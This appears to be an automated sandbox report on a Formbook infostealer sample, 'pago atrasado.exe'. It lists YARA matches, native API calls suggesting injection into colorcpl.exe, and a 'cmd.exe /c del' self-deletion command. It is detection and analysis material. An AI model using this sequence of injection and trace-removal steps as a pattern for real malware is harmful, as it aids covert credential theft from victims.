          Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: pago atrasado.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030FB
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 0453B150 appears 32 times
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: String function: 009CB150 appears 35 times
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_004185D0 NtCreateFile,1_2_004185D0
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00418680 NtReadFile,1_2_00418680
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00418700 NtClose,1_2_00418700
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_004187B0 NtAllocateVirtualMemory,1_2_004187B0
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_004185CA NtCreateFile,1_2_004185CA
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041867A NtReadFile,1_2_0041867A
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_004186FB NtClose,1_2_004186FB
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A098F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00A098F0
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00A09860
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09840 NtDelayExecution,LdrInitializeThunk,1_2_00A09840
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A099A0 NtCreateSection,LdrInitializeThunk,1_2_00A099A0
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00A09910
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09A20 NtResumeThread,LdrInitializeThunk,1_2_00A09A20
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00A09A00
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09A50 NtCreateFile,LdrInitializeThunk,1_2_00A09A50
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A095D0 NtClose,LdrInitializeThunk,1_2_00A095D0
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09540 NtReadFile,LdrInitializeThunk,1_2_00A09540
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A096E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00A096E0
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00A09660
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A097A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00A097A0
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09780 NtMapViewOfSection,LdrInitializeThunk,1_2_00A09780
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09FE0 NtCreateMutant,LdrInitializeThunk,1_2_00A09FE0
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09710 NtQueryInformationToken,LdrInitializeThunk,1_2_00A09710
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A098A0 NtWriteVirtualMemory,1_2_00A098A0
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09820 NtEnumerateKey,1_2_00A09820
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A0B040 NtSuspendThread,1_2_00A0B040
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A099D0 NtCreateProcessEx,1_2_00A099D0
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09950 NtQueueApcThread,1_2_00A09950
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09A80 NtOpenDirectoryObject,1_2_00A09A80
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09A10 NtQuerySection,1_2_00A09A10
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A0A3B0 NtGetContextThread,1_2_00A0A3B0
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09B00 NtSetValueKey,1_2_00A09B00
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A095F0 NtQueryInformationFile,1_2_00A095F0
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09520 NtWaitForSingleObject,1_2_00A09520
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A0AD30 NtSetContextThread,1_2_00A0AD30
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09560 NtWriteFile,1_2_00A09560
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A096D0 NtCreateKey,1_2_00A096D0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09610 NtEnumerateValueKey,1_2_00A09610
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09670 NtQueryInformationProcess,1_2_00A09670
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09650 NtQueryValueKey,1_2_00A09650
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09730 NtQueryVirtualMemory,1_2_00A09730
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A0A710 NtOpenProcessToken,1_2_00A0A710
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09760 NtOpenProcess,1_2_00A09760
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09770 NtSetInformationFile,1_2_00A09770
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A0A770 NtOpenThread,1_2_00A0A770
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_004185D0 NtCreateFile,1_1_004185D0
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_00418680 NtReadFile,1_1_00418680
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_00418700 NtClose,1_1_00418700
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_004187B0 NtAllocateVirtualMemory,1_1_004187B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579840 NtDelayExecution,LdrInitializeThunk,16_2_04579840
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579860 NtQuerySystemInformation,LdrInitializeThunk,16_2_04579860
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579540 NtReadFile,LdrInitializeThunk,16_2_04579540
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579910 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_04579910
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045795D0 NtClose,LdrInitializeThunk,16_2_045795D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045799A0 NtCreateSection,LdrInitializeThunk,16_2_045799A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A50 NtCreateFile,LdrInitializeThunk,16_2_04579A50
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579650 NtQueryValueKey,LdrInitializeThunk,16_2_04579650
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579660 NtAllocateVirtualMemory,LdrInitializeThunk,16_2_04579660
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045796D0 NtCreateKey,LdrInitializeThunk,16_2_045796D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045796E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_045796E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579710 NtQueryInformationToken,LdrInitializeThunk,16_2_04579710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579FE0 NtCreateMutant,LdrInitializeThunk,16_2_04579FE0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579780 NtMapViewOfSection,LdrInitializeThunk,16_2_04579780
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457B040 NtSuspendThread,16_2_0457B040
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579820 NtEnumerateKey,16_2_04579820
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045798F0 NtReadVirtualMemory,16_2_045798F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045798A0 NtWriteVirtualMemory,16_2_045798A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579950 NtQueueApcThread,16_2_04579950
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579560 NtWriteFile,16_2_04579560
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457AD30 NtSetContextThread,16_2_0457AD30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579520 NtWaitForSingleObject,16_2_04579520
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045799D0 NtCreateProcessEx,16_2_045799D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045795F0 NtQueryInformationFile,16_2_045795F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579670 NtQueryInformationProcess,16_2_04579670
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579610 NtEnumerateValueKey,16_2_04579610
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A10 NtQuerySection,16_2_04579A10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A00 NtProtectVirtualMemory,16_2_04579A00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A20 NtResumeThread,16_2_04579A20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A80 NtOpenDirectoryObject,16_2_04579A80
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579770 NtSetInformationFile,16_2_04579770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457A770 NtOpenThread,16_2_0457A770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579760 NtOpenProcess,16_2_04579760
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457A710 NtOpenProcessToken,16_2_0457A710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579B00 NtSetValueKey,16_2_04579B00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579730 NtQueryVirtualMemory,16_2_04579730
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457A3B0 NtGetContextThread,16_2_0457A3B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045797A0 NtUnmapViewOfSection,16_2_045797A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B18680 NtReadFile,16_2_02B18680
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B187B0 NtAllocateVirtualMemory,16_2_02B187B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B18700 NtClose,16_2_02B18700
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B185D0 NtCreateFile,16_2_02B185D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B186FB NtClose,16_2_02B186FB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1867A NtReadFile,16_2_02B1867A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B185CA NtCreateFile,16_2_02B185CA
          Source: pago atrasado.exe, 00000000.00000003.244765966.000000000F1B6000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs pago atrasado.exe
          Source: pago atrasado.exe, 00000001.00000003.248962710.0000000000786000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs pago atrasado.exe
          Source: pago atrasado.exe, 00000001.00000002.327286991.0000000002973000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamecolorcpl.exej% vs pago atrasado.exe
          Source: C:\Users\user\Desktop\pago atrasado.exe File read: C:\Users\user\Desktop\pago atrasado.exe
          Source: pago atrasado.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\pago atrasado.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Users\user\Desktop\pago atrasado.exe Process created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\pago atrasado.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
